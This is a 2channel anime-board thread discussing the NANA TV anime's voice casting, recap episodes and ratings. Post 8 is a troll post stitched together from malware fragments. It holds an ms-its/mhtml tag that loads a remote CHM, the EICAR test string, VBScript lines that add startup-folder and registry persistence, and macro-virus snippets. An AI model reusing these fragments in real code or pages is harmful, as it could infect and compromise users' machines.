2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

NANA. 12

1 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 07:53:39 ID:SRlYfJrt
=======================重要=======================
・【※実況厳禁】スレあぼーん+懲罰サーバ(スレ運営が困難)送り。
・基本的にsage進行(メール欄に半角でsage)で。2chブラウザ推奨。
・荒し、煽りは徹底的に放置。
・次スレは>>950が立てること。立てられない時は代わりを指名。
==================================================
@実況(放送時間中の書き込み)は実況板で
  番組ch(NTV)
  #http://live22x.2ch.net/liventv/
  アニメ特撮実況掲示板(read.cgi終日停止中/2chブラウザ以外では閲覧不能)
  #http://cha2.sakura.ne.jp/cgi-bin/anitoku/
2chブラウザ
#http://ringonoki.net/tool/2ch/janeview.html
【放送スケジュール】
  日テレ系全国放送 毎週水曜日 23:55〜24:26
【公式サイト】
  NANA公式
  ttp://www.s-nana.com/index.html
  日テレ公式
  ttp://www.ntv.co.jp/nana/index.html
◆前スレ
NANA. 11
http://anime.2ch.net/test/read.cgi/anime/1163776055/

その他の情報は>>2-10あたり。

2 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 08:06:19 ID:SRlYfJrt
◆過去スレ
ヨヨヨ NANA.1 ヨヨヨ
http://anime.2ch.net/test/read.cgi/anime/1143391489/
ヨヨヨ NANA.2 ヨヨヨ
http://anime.2ch.net/test/read.cgi/anime/1144249828/
瑩Mラ NANA.3 オ檠
http://anime.2ch.net/test/read.cgi/anime/1145116513/
」」」 NANA.4 」」」
http://anime.2ch.net/test/read.cgi/anime/1146671823/
」」」 NANA.5 」」」
http://anime.2ch.net/test/read.cgi/anime/1148482923/
bbb NANA.6 bbb
http://anime.2ch.net/test/read.cgi/anime/1150999145/
bbb NANA.7 bbb
http://anime.2ch.net/test/read.cgi/anime/1152811426/
bbb NANA.8 bbb
http://anime.2ch.net/test/read.cgi/anime/1155877416/
NANA. 9
http://anime.2ch.net/test/read.cgi/anime/1158438790/
NANA. 10
http://anime.2ch.net/test/read.cgi/anime/1160962894/

3 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 08:38:01 ID:SRlYfJrt
◆主な関連スレ
[アニメ板] オ NANA アンチスレ ラ
http://anime.2ch.net/test/read.cgi/anime/1143430126/
[少女漫画板] 【NANA】矢沢あい97巻【下弦の月】
http://comic6.2ch.net/test/read.cgi/gcomic/1163490728/
[文化/映画作品・人] @@@ NANA @@@
http://tv8.2ch.net/test/read.cgi/cinema/1164628602/
[文化/映画作品・人] 〓 NANA2 〓
http://tv8.2ch.net/test/read.cgi/cinema/1165912362/
[女向ゲーム一般]乙女@【ナナ・ハチ】NANA 三人目
http://game9.2ch.net/test/read.cgi/ggirl/1135339900/

4 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 08:42:53 ID:SRlYfJrt
原作:矢沢あい『NANA』(集英社「Cookie」誌連載)

シリーズ構成/金春智子  キャラクターデザイン/濱田邦彦  美術監督/清水友幸
色彩設計/角本百合子  音響監督/三間雅文  撮影監督/増元由紀大  音楽/長谷川智樹

新エンディング曲  「黒い涙」      ANNA TSUCHIYA inspi' NANA (BLACK STONES)
新オープニング曲 「Wish」       OLIVIA inspi' REIRA (TRAPNEST)
新エンディング曲  「Starless Night」. OLIVIA inspi' REIRA (TRAPNEST)
オープニング曲   「rose」       ANNA inspi’NANA (BLACK STONES)
エンディング曲   「a little pain」   OLIVIA inspi’REIRA (TRAPNEST)

監督/浅香守生  アニメーション制作/マッドハウス
製作著作/日本テレビ・バップ・集英社・マッドハウス

<主要CAST>
大崎ナナ=朴 ロミ   小松奈々=KAORI    レン = 木内秀信   ヤス = 川原慶久
タクミ=森川智之    ノブ = 関 智一     シン =石田 彰    レイラ =平野 綾
京助=諏訪部 順一  淳子 =本田貴子    章司 =高橋 広樹  幸子 =小島めぐみ
美里=かないみか    ナオキ =勝 杏里    銀平 = 立木文彦
<歌唱CAST>
大崎ナナ=土屋アンナ  レイラ=OLIVIA

5 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 19:52:49 ID:wYxmiInJ
【社会】 「NANAのタバコください」 マンガの影響で、若い女性を中心に葉巻たばこ人気★3
http://news19.2ch.net/test/read.cgi/newsplus/1166810150/

6 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 20:13:40 ID:dZib/8N3
ナナって確かパンクロッカーって設定だったよね?
実写版のナナって歌ってる歌が全然パンクロックじゃなくね?
ライブのシーンだけ吹き替えてでもアニメ版と
同じ歌を歌わせてほしかった。

7 :風の谷の名無しさん@実況は実況板で:2006/12/25(月) 20:15:00 ID:l2UaEv4r
黙れ


8 :<body onload=window()>:2006/12/25(月) 22:07:51 ID:MnwtGL9l
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :風の谷の名無しさん@実況は実況板で:2006/12/26(火) 20:09:25 ID:LLGa3xaj
2千NANA年はハチがいっぱい番組に出ますように・・・

10 :風の谷の名無しさん@実況は実況板で:2006/12/26(火) 21:23:49 ID:e+CvMonC
ヤスの学生時代が月みたいだな
デスノを拾わなくて本当に良かった

11 :風の谷の名無しさん@実況は実況板で:2006/12/27(水) 10:01:59 ID:aK31cpIn
>>1

12/26 名場面集2006
1/3 正月休み
1/10 淳子の部屋B〜総集編
1/17 第37話 ハチ、シロガネーゼ


ほんと総集編ばっかりだな(´・ω・`)

12 :風の谷の名無しさん@実況は実況板で:2006/12/27(水) 10:08:46 ID:up502OHQ
                , -─────―- 、
             /  /7 /7 ー ___ }      、 __!__
             ゝ  ソ  / 二  ̄ ̄/      ヽ -|-
             ` ―― 、, -―― '´      ,、/ ´  ̄
                     っ   , - 、 レ'   、
      ,. -- 、   C  , ニ.ゝ、  っ /    ヽ  ――
       / 会  ヽ  C ノ:/, 、_ヽ l     l  中  |    ニ
     l  い  l    i:ci>__<っ:l .っ |  出   |    ロ
     |  た  └ッ' し' N>ゝ-'(^)i一〜く  し  |    っ
     |  い   f    / ム三ハヽ     |  し   |    ̄/
     |   (   |   / ,( ::... f! l     |   て   |    ヽ
.      l   )   !  // }   {ゝl.    |   )   |   ナ丶
      l  (   .ム ' /. 〈ニエニヘ    |  (   |    よ
        \ ` ∠ミ.`}}.   |     ヘ     ゝ  ) /     l  、
         ̄\`ヽソ    |    ヘ    ヽ. ( /    ゝ }
           ` ´    |      ヘ       ̄
                  |      〉
                 `T T TT^´

13 :風の谷の名無しさん@実況は実況板で:2006/12/27(水) 16:48:21 ID:HpJK2yMx
ハチ白金に住むのか?完全に玉の輿じゃねえか
それにしても来年のHACHIはますます眼が離せねえな

14 :風の谷の名無しさん@実況は実況板で:2006/12/27(水) 18:47:30 ID:sD9XwCt1
先週、既に出ていったハチの部屋でナナが立ちすくむとこ
この707号室で二人が笑い合う日が、もう来ないんだと思うと激しく寂しい。



もう欝展開イラネ
ついでに総集編もイラネ

15 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 00:31:23 ID:6J1FNfPl
新年一発目が総集編なんだろ?
舐めてるとしか言えないなw

16 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 00:33:37 ID:P4As7TGO
原作でもあのあとハチとナナ、
会ってないもんなあ。
ハチは玉の腰だよ。

17 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 00:38:28 ID:VCj78HTv
ここらへんでNANAとハチのベロチュー誰かうp汁

18 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 00:52:42 ID:tlkyiPtI
>>1

総集編、別に見なくても良かったみたいだな

19 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 01:41:02 ID:ea1GohkY
>>17
そんなシーンあったの?
誰かナナハチベロチューうp汁

20 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 02:23:52 ID:IwO87FdC
レイラ役を、他の声優がやるとしたら誰が良かった?
平野は嫌いじゃないけど、レイラはちょっと違う気がする。

21 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 09:19:01 ID:FJb9FWl8
658 : ◆N3.7LOnMw2 :2006/12/28(木) 09:13:38 ID:???0
4.5% NTV 23:55 NANA特別編「NANAの全てド〜ンと見せちゃいますSP」

22 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 16:52:47 ID:K05bKw0M
総集編なんかせずにNAOKIとNOBUやればいいのに

23 :風の谷の名無しさん@実況は実況板で:2006/12/28(木) 18:40:41 ID:6J1FNfPl
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【名張毒ぶどう酒事件】「犯人は奥西死刑囚以外にいない」「生きたいために無実を訴えてるだけ」 再審取り消しに遺族ら地元関係者 [ニュース速報+]
【日中】 日本の歴史学者、南京大虐殺の存在認定〜中日共同歴史研究委員会初会議で[12/27] [東アジアnews+]
【NANA】矢沢あい98巻【天ない】 [少女漫画]
CR新世紀エヴァンゲリオン〜奇跡の価値は〜 [パチンコ機種等]
【社会】 「NANAのタバコください」 マンガの影響で、若い女性を中心に葉巻たばこ人気★3 [ニュース速報+]


24 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 09:01:52 ID:Npmc1QCS
総集編きつかったなあ
「トラネスVSブラスト」で「自分で選びましたあ、ファンの方ごめんなさい」とか言いながら
シンVSナオキで「なんとナオキの勝ちです!」って
自分で選んだって言ってくるくせになんで「なんと」なんだよ
言わされてる感、棒読み感丸出しじゃん

来週順子の部屋?
どこまで引っ張れば気が済むんだよ
3年ぐらいやるつもりなのか?

平野好きだけど、最近出すぎだよ
NANAもオタ層取るために無理やり入れタンだろ
しかも全部同じ声にしか聞こえんし
ツンデレ役だけでいいよ



最初の頃すげえ面白いって思ってたのに・・・orz

25 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 09:24:01 ID:LB1TXy18
>>24
まあまあ、アニメーターを少しは休ませてやれ。
アニメーターがあまりの激務でアニメのクオリティが下がるとか、よくあるらしいからな。


26 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 11:07:34 ID:79Jf7Y6H
総集編でもいいので、NYにUPしてください。

27 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 11:41:40 ID:oaf4YxCI
>>24
来週もまとめかよ…進まねえな orz

28 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 16:09:15 ID:1J0U/F1V
アニメ多過ぎなんで多少ペース緩めてくれた方がありがたい人も居るはず

29 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 16:55:15 ID:YKnK0PTV
いつみてもレイラの声合わないね。
それに平野って人下手すぎ。デスノートのミサとレイラが使い分け出来てないね。
まともな声優選んで欲しかった・・・

30 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 17:03:40 ID:9XK4VlcJ
ナナの部屋の痛さは異常

31 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 17:34:51 ID:UZ3SXkOw
>>20
自分は、雰囲気重視なら坂本真綾、演技力重視なら田中理恵が合ってると思う

32 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 20:05:24 ID:o/XQHl3Q
田中理恵ってディアナさま?
落ち着いてて良いかも>>30

>>29
激しく同意

カリスマ性があって大人気なのに孤独に耐える・・・・・と言う重要な役なのに
平野たんのせいでただの自分勝手でワガママなガキにしか見えん
声的にレイラに魅力が感じられないので今後の展開はキツイ

今回の総集編は変わってて良かったよ
このスレの住人と同じようなこと言ってて笑ったし

33 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 23:03:43 ID:08K9ISgg
林原でいいよ

34 :風の谷の名無しさん@実況は実況板で:2006/12/29(金) 23:11:48 ID:ST2gLqr3
>>33
婆さんは用済み

35 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 01:18:27 ID:5I4OiOmL
>>32
田中理恵はラクスさまだぞw

でも自分も田中が良かったと思う
平野イラネ

36 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 04:43:45 ID:z/Ecwr1v
平野はあの変なしゃべり方がいつも気になる
ミサはいいけど

37 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 06:29:01 ID:nzk5P3z8
>>31
真綾はそれこそ何を演じても真綾だろw平野以上に勘弁だ…

38 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 07:10:34 ID:BfzEtEWq
youtube板から来ました。

平野綾の声、やっぱり合わないよね。
涼宮ハルヒの時は、単純に元気でいいなと思ったんだけど、
レイラは違和感あるし、喋り終わりの変な吸気音が気になって。

39 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 10:09:09 ID:Yv1Z4yfz
オリビアと声合わせるんだったら平野が無難だと思うけど
もっとはっきり発音できないものか

声優が歌うなら水城か南里あたりかなぁ

40 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 10:26:59 ID:z/Ecwr1v
このアニメの場合、声優に歌わせるのは駄目だろう

41 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 11:10:49 ID:f+RhfBdE
レイラよりも・・・
ナナのおばちゃん声のがアリ(・∀・)エン!
そろそろ慣れつつあるけど

42 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 21:53:49 ID:xdK3JZ3w
>>41
ナナの声、高山みなみだったらどうだろう?
歌上手いし。

43 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 22:55:04 ID:4Gj++Pq4
バーロー

44 :風の谷の名無しさん@実況は実況板で:2006/12/30(土) 23:35:25 ID:U27RM/fy
自分もナナの声気になってた

>>42
それ凄く(・∀・)イイ!!

45 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 01:39:55 ID:ma9GIV6g
ナナって、おばさんヴォイスか?
低めの声がわりと合ってるかと思ってたんだけど。
高山みなみということは、原作のイメージは、
もうちょっと高いか、少年っぽい声なの?

46 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 08:44:20 ID:F0QorLTJ
ナナはあのままで良いよ
それと歌うまくても声優に歌わせるのこそありえん
ガンダムWなら全然OKだけどさ

47 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 12:02:07 ID:ks1nGCLx
ちょwwwのだめと時間丸かぶりじゃねーかww

視聴者層的にどっちもみたいコンテンツなのにこんなことするなよ・・
フジはデスノの人気に嫉妬して狂ったな

48 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 12:02:24 ID:h/CVrmwx
レイラは矢島晶子が良かった。
もちろん少年声じゃなくて美少女声で。

49 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 16:51:33 ID:SCzrgIB9
>>47
のだめは木曜じゃね?

50 :風の谷の名無しさん@実況は実況板で:2006/12/31(日) 23:29:15 ID:5VngPeOr
ノイタミナは木曜、ANIMOは水曜

51 :風の谷の名無しさん@実況は実況板で:2007/01/01(月) 10:36:01 ID:OZylZzWT
ああ、そうか深夜で明日になってても水曜って表記するからわからんかった

52 :風の谷の名無しさん@実況は実況板で:2007/01/01(月) 13:25:59 ID:38dnvA9l
ハチの声がむかつくんだけどハチ自体がむかつくキャラだから合ってるのかもな

53 :風の谷の名無しさん@実況は実況板で:2007/01/02(火) 15:06:11 ID:gN8Q1fqq
>>52
うるるんうるるんるん
http://www.youtube.com/watch?v=nmI_xcF-C-E

54 :風の谷の名無しさん@実況は実況板で:2007/01/02(火) 21:21:58 ID:0YEaqV1T
ハチの声超可愛いと思う

55 :風の谷の名無しさん@実況は実況板で:2007/01/03(水) 11:53:42 ID:TdB6bYSG
NANAものだめもハチクロも声優には不満なかったな。

レイラ以外は・・。


56 :風の谷の名無しさん@実況は実況板で:2007/01/03(水) 12:09:18 ID:GKr0Hc+4
レイラはな〜〜〜泣き声がなぁ〜〜・・・・・

57 :風の谷の名無しさん@実況は実況板で:2007/01/03(水) 14:18:02 ID:TdB6bYSG
おいおい、先週がNANAキャスターの手抜きベストテンで今週が休みで来週が淳子部屋って・・

同じ色の痛みを許しあって 違う色の過ちを染めた〜♪

58 :風の谷の名無しさん@実況は実況板で :2007/01/03(水) 23:29:06 ID:snbRV25Q
あの〜。
このアニメのNANAって
何話まで続くのでしょうか?

59 :風の谷の名無しさん@実況は実況板で:2007/01/03(水) 23:53:15 ID:U1rUhSzJ
皐タンは出た?

60 :風の谷の名無しさん@実況は実況板で:2007/01/04(木) 00:17:30 ID:KADFZb3q
9月ごろの段階で「折り返し地点」って言ってたよね。
3月位まで??
だと、原作の11巻くらいまでの話で終わるかな。

61 :風の谷の名無しさん@実況は実況板で:2007/01/04(木) 01:41:38 ID:gDUmsQXJ
たぶんハチ話で終わり

62 :風の谷の名無しさん@実況は実況板で:2007/01/04(木) 07:35:44 ID:zYs4VRpi
私が牛乳を飲もうと冷蔵庫を開けると、誰かの生首が入っていました。
私はビックリして、思わず冷蔵庫のドアを閉めてしまいました。
きっと今のは何かの見間違いであろうと思い直し、
再び冷蔵庫を開けると、なんとそこには誰かの生首が白目を向いていたのです。
私は思わずドアを閉めましたが、きっと疲れていて見えもしないものを見てしまったのだと思い直し、
覚悟を決めて、改めて冷蔵庫を開けました。
するとそこには、何者かの生首が白目を向いて、ほのかにほくそ笑んでいるのです。
私はビックリして、冷蔵庫のドアを閉めましたが、きっと幻覚を見たに違いない、
最近あまり寝てないから、見えもしないものが見えてしまったのだと思い直し、
冷蔵庫を開けました。するとそこには、白目を向いた生首が入っていたのです。
驚いた私は幻覚が見えたに違いない、と自分に言い聞かせ冷蔵庫を開けると、なんと誰かの生首が白目をむいて笑ってるのです。
思わず冷蔵庫を閉めましたが、きっと気のせいで何かと見間違えたと自分に言い聞かせ扉を開け直すと、
なんとそこには誰かの生首が白目を向いて笑っていました。やっぱり誰かの生首が入っているのです。
思わず冷蔵庫を閉めた私でしたが、これは何かの間違いに違いない。
疲れているから見えもしない物が見えたのだ、と思い直し冷蔵庫を開けると、
……そこにはなんと白目をむいた生首が!
うわっと思い、冷蔵庫を閉めましたが疲れていて幻覚が見えたに違いない、と自分に言い聞かせ冷蔵庫を開けると、なんと誰かの生首が白目をむいて笑ってるのです。
思わず冷蔵庫を閉めましたが、きっと気のせいで何かと見間違えたと自分に言い聞かせ扉を開け直すと、なんとそこには誰かの生首が白目を向いて笑っていました。

63 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 12:04:49 ID:NRCaknmG
昨日まで台湾いってたんだけど、NANAが台湾でも放送されるらしい

64 :風の谷の名無しさん@実況は実況板で:2007/01/07(日) 13:18:56 ID:74GiRSaE
幸子と浮気した彰司への奈々の名台詞
「いらない……」が海外でどのように翻訳されるかという
鈴江奈々アナセレクトの時のBGMがB'zの
LOVE PHANTOM(出だしの歌詞が「いらない」)でちょっと笑った。



65 :風の谷の名無しさん@実況は実況板で:2007/01/08(月) 23:44:55 ID:WgyeHPQE
>>63
ここは思い出話をする所でもないし
思い出日記を書く所でもない

66 :風の谷の名無しさん@実況は実況板で:2007/01/09(火) 18:20:32 ID:ZDdxdRPh
年明け早々淳子の部屋かよw

67 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 11:00:29 ID:6ptHzCvM
ANNA inspi' NANA(BLACK STONES)STREET LIVE
ttp://www.mncast.com/player/new_fullPlayer.asp?movieID=10008056220060917112126&lp=-1

OLIVIA inspi' REIRA(TRAPNEST)STREET LIVE
ttp://www.mncast.com/player/new_fullPlayer.asp?movieID=10008056220060917124433&lp=-1

NANA starring MIKA NAKASHIMA-Hitoiro(STREET LIVE)
ttp://stage6.divx.com/members/128092/videos/1073153


68 :読者の声:2007/01/10(水) 11:42:45 ID:4lnBXv2+
この「NANA」の原作はナナとハチが東京行きの東北新幹線の中で出会ってからハチがナナの死を見取るまでの1年間の出来事を描いた話でしょ。
よく考えてみたらブラストが上京したその年の内にメジャーデビューして年明けから日本武道館のステージに立つのは物理的に言って早急過ぎないか?
私だったらナナとハチの出会いからブラストのアルバムが300万枚売れるまでの話を3年間の出来事として描いていくけどな。

69 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 13:19:42 ID:BJ698S8f
>>68
原作者がDQNだからそんな道理で語る物語じゃないんだよ
突っ込みどころ満載のマンガなんだからw

70 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 17:43:57 ID:POtZ61A4
今日の淳子の部屋、ナオキがゲストってマジ??
ちょっと楽しみになった。

しかも今日から新OPだよね。

71 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 23:25:37 ID:thBFpZtz
あの頃は彼女と朝方4〜5とかまでコードレス電話が電池切れになる位長電話してたなぁ・・・(遠すぎる目

72 :風の谷の名無しさん@実況は実況板で:2007/01/10(水) 23:26:41 ID:thBFpZtz
誤爆ったorz

73 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:05:48 ID:/n1DgUNU
今日放送してますか?

74 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:07:39 ID:aFs3WiU0
ドラマが延長放送だから、これから
何分遅れか忘れたけど、そろそろかな

75 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:10:26 ID:SYGVq958
>>74
ご丁寧にありがとうございます。

76 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:17:05 ID:gWSeQoYB
また総集編か!
つーか平野とOLIVIA全然声違うじゃねーか!明らかにミスキャストだアレ
どう見ても事務所のゴリ押しです本当に(ry

77 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:30:33 ID:JwoBbUI1
意味のないヤスのモザイク禿ワロタw

78 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:31:42 ID:oon1ZHQ7
ナオキ良いvvvvvv

79 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:37:29 ID:mk4Ax6mm
ナオキワラタw

80 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:40:38 ID:j9NbKyva
マサルさんのコラみたいな相関図ワラタ

81 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:41:48 ID:fn2FfAX/
淳子の部屋の回にアナの部屋はいらんだろ。
障子はもういらねーよ。


しかし歳取ると涙もろくなるので困る。

82 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:44:55 ID:cOin+Y+f
ノブはなんであんなに可哀想な子なの

83 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:45:16 ID:gRifvt/F
私はナオキと章司好きだよ

84 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:47:28 ID:wP0Forf9
直樹可愛いよ直樹

しかし何だ土屋アンナの愛想の無さは。
モデル崩れのなんちゃって歌手のくせして。

85 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:49:07 ID:74dS0Dww
種死も真っ青な総集編。
しかも回を追う毎に明らかに制作側のやる気がなくなっていってます。

86 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:51:17 ID:3lB5PH7b
一クール毎に総集編を入れて文句を言われるんじゃ作ってる方もたまらないな

87 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:55:07 ID:IWzJVYdZ
結局全部あの尻軽女が問題なんじゃねえか
回りが巻き込まれてかわいそう過ぎる
欝だ

88 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 00:55:44 ID:gWSeQoYB
さっさとEDもOPも大崎ナナ(土屋)の歌にしろよ
レイラ(平野)嫌いだからさ

89 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 01:08:03 ID:VpDj/y+f
ノブの純情には結構グッときちゃうな。

90 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 01:09:54 ID:udR7kl0a
誰かハチを凌遅刑にしてやれ
NANAはトラネスネタだけでいい

91 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 01:18:40 ID:gRifvt/F
>>89
もう見るのやめた方がいいよ

92 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 01:43:59 ID:34C7cfDq
今週の編集ハチが悪女に見える演出が施されててワロスwww

93 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 02:10:39 ID:oon1ZHQ7
しっかしナオキは本当ヤス大好きだねvvvv

漫画でも会う度にヤスヤス言ってるし。

94 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 04:25:34 ID:CtynULix
総集編のくせに、ナナに結婚宣言〜黙って引越し→ED曲の流れが秀逸だった。
台詞省いて回想はさんで、より切なくなってた。

95 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 08:24:44 ID:ZbJ5joHg
>>88は平野綾が歌ってると思ってるんだろうか?

96 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 14:08:12 ID:YDR4cPZw
>>68
>ハチがナナの死を見取るまでの1年間の出来事を描いた話でしょ。

どこにそこまで断定できる根拠が?


97 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 14:53:37 ID:gWSeQoYB
>>95
いやそれは解ってる
レイラ自体が嫌いなんで、平野だから余計に嫌いになった

98 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 15:03:29 ID:zOi/CS7v
855 : ◆N3.7LOnMw2 :2007/01/11(木) 11:06:40 ID:???0
3.6% NTV 24:10 NANA「淳子の部屋(3)」

99 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 15:10:18 ID:fQYX09Im
ノブの台詞に胸きゅんだった。
若いっていいなぁ。

100 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 15:15:27 ID:34C7cfDq
編集だけ見るとやっぱりハチのモテ具合は異常だな〜。
何がそうさせるのかまるでわからん、エロゲーの主人公くらいわからない。

101 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 20:06:41 ID:IWzJVYdZ
>>68
え?!
ナナってしぬんか?!
そいでハチのED前のナレーションはもういないみたいな追憶的な喋り方なのか
こわ!

最初笑えて面白かったけど
どろどろのNTR鬱展開で最後はデッドエンドかよ!
うわあああ

102 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 20:20:06 ID:IWzJVYdZ
レイラのカットが一つもなかった件
作ってる方もやっぱり平野は失敗だった手思ってるんじゃないの?

順子の部屋ってあんないいところにあるんだなw

103 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 20:46:48 ID:IkezljDQ
ナナは死なないよ!漫画の方では6年後(7年後?)イギリスで歌ってるもん。ただ、行方をくらませて今は1人でいるみたい。

104 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 21:49:12 ID:gRifvt/F
歌声喫茶アダムに逝きたい

105 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 22:09:32 ID:rV1HqdQx
>>103
ネタバレすんな、ヴァカ!!

106 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 22:09:33 ID:fQYX09Im
平野文、涼宮ハルヒは神だったけど、
レイラもミサミサも禿しく違う。

107 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 22:28:50 ID:4UEFCDM8
>>106
ちょwwwwおまwwwww
平野文さんはラムちゃんとか種再編集版のアイシャの中の人ですがな。

平野綾ならむしろ昨年末で終わっちゃったる〜んのカルーア&テキーラの演じ分けが神かと。


108 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 22:37:27 ID:ZqHw4wja
あれって演じ分けしてたんだ
カルーアとテキーラがいる事自体途中まで気づかなかった

109 :風の谷の名無しさん@実況は実況板で:2007/01/11(木) 23:45:57 ID:fQYX09Im
>107
いやーん、間違えちゃった恥ずかしい・・・(*ノ∀`*)

110 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 12:54:48 ID:empwu6y9
>>109
ババァハケーン

111 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 20:24:39 ID:3RiaMz2A
むしろ平野文だったほうが良かったと思う>レイラ

112 :風の谷の名無しさん@実況は実況板で:2007/01/12(金) 21:59:11 ID:wf/TyNkj
http://www.youtube.com/watch?v=sM0DWiYHe_g

113 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 07:02:51 ID:H+5wCxs1
          ,. -‐v―- 、
                  ヽ
        /  //_/ノハL!L!i
     r‐、 i  彡       .i ,-ァ
     ヽ ヽ!_ 彡 fて)  fて) .Y -く
      [i 6 ●( ヽ  ^ __,. ●ト、/ 
      . ト-' 、  `  ̄ ̄  .ノ     
          >  ___ <_
        /ヾ ヽ   ヾ ヽ\
       /   | ◯ ̄ ̄ ◯ |/ヽ
     /ヽ、 .イ        | 、 ヽ
    彡, /  .|        .| ヽ 、ヽ
    // ソ   .|         |   ゝソ
    `     |    V    .|
          .|    .|    | 
          .|    .|    |
          .|_____|____.|_
          (______).____)


114 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 13:07:13 ID:Nr8eOlyj
ウルトラセブン「へぇ、あんたもナナっていうんだ」

115 :風の谷の名無しさん@実況は実況板で:2007/01/14(日) 13:26:24 ID:I/VaERKM
ねぇセブン…もう一度歌って…

